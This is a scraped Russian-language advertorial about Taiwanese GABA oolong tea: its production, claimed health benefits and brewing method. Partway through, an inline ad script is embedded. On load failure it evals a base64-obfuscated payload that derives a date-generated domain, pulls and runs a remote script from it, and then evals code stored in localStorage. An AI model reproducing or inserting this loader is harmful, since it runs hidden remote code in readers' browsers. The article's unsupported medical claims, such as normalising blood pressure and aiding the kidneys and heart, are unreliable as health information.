Габа-чай (габарон) – удивительный напиток от тайваньских чайных мастеров. В обработанном по специальному рецепту чайном листе вырабатывается гамма-аминомасляная кислота. Это вещество необходимо человеческому организму для передачи нервных импульсов и правильной работы мозга. Как делают габароны и в чем их польза – расскажем в этой статье.
Габароны – уникальные бирюзовые чаи
Начнем с того, что Габа чай – это улун, но особенный. На одном из этапов обработки чайный лист оставляют в специальной камере без доступа кислорода. Именно в вакууме в нем вырабатывается гамма-аминомасляная кислота (ГАМК).
Таким образом можно обработать любой чай – зеленый, черный, даже пуэр. Но на Тайване изготавливают с основном улуны.
Почему Габа чаи особенные
Все дело в содержании ГАМК, это натуральный нейромедиатор. В зависимости от сорта (основные можно увидеть в каталоге https://taetea.com.ua/ulun-oolong/gaba-chaj/), бывают разные Gaba, купить их стремятся не только для удовольствия, но и для пользы.
Если в организме нет сбоев, он вырабатывает ГАМК в нужном количестве. Но из-за стрессов, плохой экологии, усталости, неправильного питания и других факторов выработка сокращается. В результате человек ощущает упадок сил, ухудшение настроения, нарушается сон.
Долгое время ученые пытались создать лекарство, но ГАМК в составе химических формул плохо усваивается. Когда в 1987 году японские специалисты изобрели рецепт удивительного чая, проблему удалось решить. Оказалось, организм с удовольствием впитывает ценное вещество из улуна. (adsbygoogle = window.adsbygoogle || []).push({}); var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Польза габаронов
Попробуйте Gaba чай, он не только вкусный, но и полезный. Даже одно чаепитие поможет организму снизить дефицит гамма-аминомасляной кислоты и чувствовать себя лучше.
Этот улун особенно полезен людям, которые регулярно сталкиваются со стрессами, испытывают тревожность, страдают от бессонницы и повышенного давления.
Польза чая:
Улучшает настроение, память и качество сна.Помогает ощутить гармонию, избавиться от перепадов настроения.Нормализует давление.Снимает излишнее мышечное напряжение.Улучшает работу почек, полезен для сердца и женского здоровья.Тонизирует, освежает силы и не перегружает нервную систему.
У Габа-чая светлый прозрачный настой золотистого оттенка. В аромате ноты свежести и цветов. Во вкусе приятная хлебная нотка, аккорды карамели, солнечного леса и вкусной аптечной микстуры.
Заварите чай Габа правильно
Метод настаивания, который обычно используют европейцы, не подходит. Лучше заваривать улун проливами, как делают в Китае.
Подготовьте качественную воду. Водопроводная слишком жесткая, предварительно ее лучше отстаивать. Идеальный вариант – бутилированная (но не минеральная).После того, как вода закипит, дайте ей остыть 5 минут.На 150 мл воды достаточно 5-8 граммов чая. Залейте воду, чтобы она покрыла чаинки. Сразу слейте, первый пролив не пьют.Второй раз настаивайте от 15 секунд и можно пить.Одна порция качественного габарона выдерживает 6-8 завариваний. С каждым проливом чай настаивают чуть дольше.
Наслаждайтесь! Пейте Габа-чай без спешки, и он удивит вас изящными оттенками вкуса. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/mify-i-pravda-o-gaba-chayah/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook